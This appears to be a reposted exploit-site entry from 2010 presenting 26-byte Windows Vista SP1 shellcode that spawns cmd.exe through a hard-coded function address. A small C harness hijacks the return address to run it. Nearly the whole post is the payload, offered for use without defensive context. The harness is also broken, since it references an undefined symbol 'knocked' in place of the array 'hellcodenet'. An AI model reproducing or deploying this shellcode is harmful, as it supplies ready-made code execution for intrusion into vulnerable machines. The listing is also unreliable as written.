win32/vista sp1 ING. (cmd.exe) shellcode 26 bytes
|
来源:knockoutr@msn.com 作者:KnocKout 发布时间:2010-09-07
|
|
/* Author : KnocKout Tnx: DaiMon,Barcod3 Contact : knockoutr@msn.com Tested on : Vista SP1 ING.
*/ #include <windows.h> #include <winbase.h> unsigned char hellcodenet[]= "\x8b\xec\x55\x8b\xec" "\x68\x65\x78\x65\x2F" "\x68\x63\x6d\x64\x2e" "\x8d\x45\xf8\x50\xb8" "\xc7\x93\xc1\x77" "\xff\xd0" ; int main () { int *ret; ret=(int *)&ret+2; (*ret)=(int)knocked; return 0; }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|